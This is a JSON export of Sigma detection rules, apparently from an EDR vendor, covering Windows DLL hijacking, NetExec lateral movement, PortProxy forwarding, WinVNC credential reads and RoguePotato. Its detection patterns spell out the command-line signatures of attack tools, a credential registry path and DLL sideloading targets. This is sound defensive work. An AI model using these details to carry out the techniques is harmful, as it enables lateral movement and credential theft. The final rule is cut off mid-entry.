"rule_description": "Detects potential Windows DLL Hijacking via spaceagent.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61d02029-6ce0-4318-93d9-ed903605dcac",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628399Z",
"creation_date": "2026-03-23T11:45:34.628401Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628406Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Pennyw0rth/NetExec",
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1021/002/",
"https://attack.mitre.org/techniques/T1021/003/",
"https://attack.mitre.org/software/S0488/"
],
"name": "t1047_netexec_lateral_movement.yml",
"content": "title: NetExec Lateral Movement Detected\nid: 61d02029-6ce0-4318-93d9-ed903605dcac\ndescription: |\n Detects lateral movement made using NetExec tools.\n NetExec is the new name of CrackMapExec, a tool intended to ease lateral movement, internal recon and credential gathering actions.\n It offers multiples options to remotely execute commands:\n - wmiexec: execute via WMI, the parent of the command will be WMIPrvse.exe;\n - atexec: execute via a schedule task, the parent of the command will be svchost.exe or taskeng.exe;\n - mmcexec: execute a command via DCOM, the parent of the command will be mmc.exe;\n - smbexec: execute via a service, the parent of the command will be services.exe.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/Pennyw0rth/NetExec\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1021/003/\n - https://attack.mitre.org/software/S0488/\ndate: 2023/12/20\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.002\n - attack.t1021.003\n - attack.s0488\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_other:\n ParentImage|endswith:\n - '\\wmiprvse.exe' # wmiexec\n - '\\mmc.exe' # mmcexec\n - '\\explorer.exe' # dcomexec ShellBrowserWindow\n - '\\services.exe' # smbexec\n CommandLine|endswith:\n # wmiexec\n - 'cmd.exe /Q /c *1> * 2>&1 && certutil -encodehex -f * && for /F * %G in (*) do reg add HKLM\\\\* /v * /t REG_SZ /d * /f && del /q /f /s *'\n # mmcexec\n - 'cmd.exe /Q /c * 1> \\Windows\\Temp\\\\* 2>&1'\n # smbexec\n - 'cmd.exe* /Q /c * ^> \\\\\\\\*\\\\* 2^>^&1 > 
*'\n\n selection_atexec:\n ParentCommandLine|contains:\n - 'svchost.exe -k netsvcs' # atexec on win10\n - 'taskeng.exe' # atexec on win7\n CommandLine: 'cmd.exe /C *Windows\\Temp\\\\*&1'\n\n # This is handled by the rule 10c14723-61c7-4c75-92ca-9af245723ad2\n filter_impacket:\n CommandLine: '*\\\\\\\\127.0.0.1\\\\*' # specific to impacket\n\n condition: 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61d02029-6ce0-4318-93d9-ed903605dcac",
"rule_name": "NetExec Lateral Movement Detected",
"rule_description": "Detects lateral movement made using NetExec tools.\nNetExec is the new name of CrackMapExec, a tool intended to ease lateral movement, internal recon and credential gathering actions.\nIt offers multiple options to remotely execute commands:\n - wmiexec: execute via WMI, the parent of the command will be WMIPrvse.exe;\n - atexec: execute via a scheduled task, the parent of the command will be svchost.exe or taskeng.exe;\n - mmcexec: execute a command via DCOM, the parent of the command will be mmc.exe;\n - dcomexec (ShellBrowserWindow): execute a command via DCOM, the parent of the command will be explorer.exe;\n - smbexec: execute via a service, the parent of the command will be services.exe.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2023-12-20",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1021.003",
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "61e6a95d-f012-4562-af9b-2d917c66510f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069249Z",
"creation_date": "2026-03-23T11:45:34.069265Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069276Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1090_portproxy_port_forwarding.yml",
"content": "title: PortProxy Port Forwarding Set in Registry\nid: 61e6a95d-f012-4562-af9b-2d917c66510f\ndescription: |\n Detects a registry modification setting up a port forwarding configuration often used by attackers for lateral movement or to bypass network restrictions.\n Attackers may set up port forwarding configurations to evade firewalls and to grant themselves access to services that would otherwise be inaccessible.\n Note that only IPv4-to-IPv4 (v4tov4) PortProxy mappings are covered by this rule.\n It is recommended to analyze the process responsible for the registry modification and to investigate any unwanted usage of firewalled services (such as RDP) after this action.\nreferences:\n - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\n - https://attack.mitre.org/software/S0108/\ndate: 2021/04/14\nmodified: 2026/01/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.lateral_movement\n - attack.command_and_control\n - attack.t1090\n - attack.s0108\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n # Example: \"HKLM\\SYSTEM\\ControlSet001\\services\\PortProxy\\v4tov4\\tcp\\*/4444\"\n TargetObject|contains: '\\PortProxy\\v4tov4\\'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_image:\n - ProcessParentImage:\n - '?:\\Program Files\\Dell\\SysMgt\\iSM\\ismeng\\bin\\dsm_ism_srvmgr.exe'\n - '?:\\Program Files\\AgiCorp\\IMSEngine\\IMSEngine.exe'\n - ProcessAncestors|contains: '?:\\Program Files\\UniFi OS Server\\UniFi OS Server.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "61e6a95d-f012-4562-af9b-2d917c66510f",
"rule_name": "PortProxy Port Forwarding Set in Registry",
"rule_description": "Detects a registry modification setting up a port forwarding configuration often used by attackers for lateral movement or to bypass network restrictions.\nAttackers may set up port forwarding configurations to evade firewalls and to grant themselves access to services that would otherwise be inaccessible.\nNote that only IPv4-to-IPv4 (v4tov4) PortProxy mappings are covered by this rule.\nIt is recommended to analyze the process responsible for the registry modification and to investigate any unwanted usage of firewalled services (such as RDP) after this action.\n",
"rule_creation_date": "2021-04-14",
"rule_modified_date": "2026-01-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1090"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "622305f6-be32-4277-ae7e-4fc4883f8645",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599523Z",
"creation_date": "2026-03-23T11:45:34.599527Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599535Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_runexehelper.yml",
"content": "title: DLL Hijacking via runexehelper.exe\nid: 622305f6-be32-4277-ae7e-4fc4883f8645\ndescription: |\n Detects potential Windows DLL Hijacking via runexehelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'runexehelper.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "622305f6-be32-4277-ae7e-4fc4883f8645",
"rule_name": "DLL Hijacking via runexehelper.exe",
"rule_description": "Detects potential Windows DLL Hijacking via runexehelper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6290450e-94a3-43da-b84f-60b26a682603",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095524Z",
"creation_date": "2026-03-23T11:45:34.095526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095530Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://juggernaut-sec.com/password-hunting/",
"https://attack.mitre.org/techniques/T1552/002/"
],
"name": "t1003_002_susp_registry_read_winvnc_secret.yml",
"content": "title: WinVNC Secrets Read from Registry\nid: 6290450e-94a3-43da-b84f-60b26a682603\ndescription: |\n Detects a suspicious read operation on registry keys storing WinVNC configuration.\n Adversaries may attempt to steal sensitive information, such as credentials, stored in the WinVNC configuration to facilitate lateral movement within the network.\n WinVNC is a Virtual Network Computing (VNC) server that allows remote desktop access, and its configuration registry keys often contain sensitive details like authentication credentials.\n Unauthorized access to these keys could indicate an attempt to gather information for lateral traversal or persistence.\n It is recommended to investigate the process attempting to access the registry keys to determine if it is legitimate and check for any related suspicious activity that may indicate a broader compromise.\nreferences:\n - https://juggernaut-sec.com/password-hunting/\n - https://attack.mitre.org/techniques/T1552/002/\ndate: 2024/04/02\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith: 'HKU\\\\*\\SOFTWARE\\ORL\\WINVNC3\\PASSWORD\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6290450e-94a3-43da-b84f-60b26a682603",
"rule_name": "WinVNC Secrets Read from Registry",
"rule_description": "Detects a suspicious read operation on registry keys storing WinVNC configuration.\nAdversaries may attempt to steal sensitive information, such as credentials, stored in the WinVNC configuration to facilitate lateral movement within the network.\nWinVNC is a Virtual Network Computing (VNC) server that allows remote desktop access, and its configuration registry keys often contain sensitive details like authentication credentials.\nUnauthorized access to these keys could indicate an attempt to gather information for lateral movement or persistence.\nIt is recommended to investigate the process attempting to access the registry keys to determine if it is legitimate and check for any related suspicious activity that may indicate a broader compromise.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1012",
"attack.t1552.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "62c61440-0b70-41cf-8210-be55bac993e6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090916Z",
"creation_date": "2026-03-23T11:45:34.090918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090923Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_easeofaccessdialog.yml",
"content": "title: DLL Hijacking via easeofaccessdialog.exe\nid: 62c61440-0b70-41cf-8210-be55bac993e6\ndescription: |\n Detects potential Windows DLL Hijacking via easeofaccessdialog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'easeofaccessdialog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\duser.dll'\n - '\\OLEACC.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "62c61440-0b70-41cf-8210-be55bac993e6",
"rule_name": "DLL Hijacking via easeofaccessdialog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via easeofaccessdialog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63646426-5eeb-41c6-9946-60688b3bd242",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094631Z",
"creation_date": "2026-03-23T11:45:34.094633Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094637Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_baaupdate.yml",
"content": "title: DLL Hijacking via baaupdate.exe\nid: 63646426-5eeb-41c6-9946-60688b3bd242\ndescription: |\n Detects potential Windows DLL Hijacking via baaupdate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'baaupdate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FVEAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63646426-5eeb-41c6-9946-60688b3bd242",
"rule_name": "DLL Hijacking via baaupdate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via baaupdate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63982e43-6786-48d8-a87f-b89846a973a9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610350Z",
"creation_date": "2026-03-23T11:45:34.610354Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610361Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/antonioCoco/RoguePotato/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_rogue_potato_named_pipe.yml",
"content": "title: RoguePotato Named Pipe Created\nid: 63982e43-6786-48d8-a87f-b89846a973a9\ndescription: |\n Detects the creation of a named pipe related to the RoguePotato privilege escalation tool.\n RoguePotato is a privilege escalation tool that fakes an OXID resolver to force the BITS service to authenticate and steal its token.\n It is recommended to investigate the process that created the named pipe and its potential child processes, as well as processes that connected to the named pipe.\nreferences:\n - https://github.com/antonioCoco/RoguePotato/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/02/05\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.NamedPipe\n - classification.Windows.HackTool.RoguePotato\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName|endswith: '\\pipe\\epmapper'\n\n filter_epmapper:\n PipeName: '\\pipe\\epmapper'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "63982e43-6786-48d8-a87f-b89846a973a9",
"rule_name": "RoguePotato Named Pipe Created",
"rule_description": "Detects the creation of a named pipe related to the RoguePotato privilege escalation tool.\nRoguePotato is a privilege escalation tool that fakes an OXID resolver to force the BITS service to authenticate and steal its token.\nIt is recommended to investigate the process that created the named pipe and its potential child processes, as well as processes that connected to the named pipe.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "63a7d949-9fde-46be-a6fd-f97306f8447c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600721Z",
"creation_date": "2026-03-23T11:45:34.600725Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600733Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_smstore.yml",
"content": "title: DLL Hijacking via symstore.exe\nid: 63a7d949-9fde-46be-a6fd-f97306f8447c\ndescription: |\n Detects potential Windows DLL Hijacking via symstore.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/09\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: 